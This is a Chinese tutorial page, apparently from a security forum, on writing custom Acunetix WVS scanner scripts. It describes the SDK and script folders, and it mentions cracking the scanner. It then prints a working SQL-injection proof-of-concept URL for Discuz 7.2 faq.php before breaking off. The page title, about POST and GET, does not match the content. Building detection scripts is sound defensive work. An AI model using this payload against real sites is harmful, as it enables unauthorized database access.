acunetix web vulnerability scanner 中怎样把post和get请求的区别修改为post请求

自定义Acunetix WVS规则
AWVS提供了自定义的脚本编程接口,可是网上的资料很少,只有官方的几篇介绍和参考手册,最近研究了一下怎么编写AWVS的漏洞脚本来写一篇简单性的文章,大家有兴趣的可以交流。
本文以8.0为例,首先呢安装好Acunetix Web Vulnerability Scanner 8(该破解的破解,该付费的付费),然后我们需要WVS公开的小小的SDK,下载地址:/download/tools/WVSSDK.zip&,下载好了后解压bin目录下的WVSS.exe到WVS安装目录下面,此即为WVS脚本编写工具。另外sdk里还有3个简单的脚本小例子和WVS_SDK_Quick_Introduction.pdf,耐心的可以看看。
下面的截图就是WVS码脚本工具了
打开WVS数据目录,通常是在&C:\Documents and Settings\All Users\Application Data\Acunetix WVS 8\Data\Scripts&下,可以看到有10个文件夹,Network、PerFile、PerScheme、PostScan、PerFolder、PerServer、PostCrawl、WebApps、XML。我们先来认识一下:
Network:此目录下的脚本文件是当扫描器完成了端口扫描模块后执行,这些脚本可以检测TCP端口的开放情况,
比如检测FTP的21端口是否开放、是否允许匿名登录;
PerFile:此目录下的脚本是当扫描器爬虫爬到文件后执行,比如你可以检查当前测试文件是否存在备份文件,当前测试文件的内容等;
PerFolder:此目录下的脚本是当扫描器爬虫爬行到目录后执行,比如你可以检测当前测试目录是否存在列目录漏洞等;
PerScheme:此目录下的脚本会对每个URL的 GET、POST结构的参数进行检测,AWVS定义了的参数包括HTTP头、
Cookies、GET/POST参数、文件上传(multipart/form-data)&&比如你可以检测、和其他的应用程序测试;
PerServer:此目录下的脚本只在扫描开始是执行一次,比如你可以检测中间件类型;
PostScan:此目录下的脚本只在扫描结束后执行一次,比如你可以检测存储型、存储型、存储型文件包含、
存储型目录遍历、存储型代码执行、存储型文件篡改、存储型php代码执行等;
XML:漏洞的详细描述文档都在这里。
今天演示的漏洞是Discuz 7.2的faq.php ,关于漏洞:http://ha.cker.in/1087.seo
我们就用POC来写漏洞的脚本吧!
检测原理:
根据公开的POC构造出特殊请求,若存在则构造的SQL语句将会执行成功并在返回到响应内容,构造POC如下:
/faq.php?action=grouppermission&gids[99]='&gids[100][0]=)
and (select 1 from (select count(*),
concat((select 0x572),floor(
rand(0)*2))x from information_schema.tables group by x)a)%23
【声明】:黑吧安全网()登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱,我们会在最短的时间内进行处理。
上一篇:【】【】}

我要回帖

更多关于 post和get请求的区别 的文章

更多推荐

版权声明:文章内容来源于网络,版权归原作者所有,如有侵权请点击这里与我们联系,我们将及时删除。

点击添加站长微信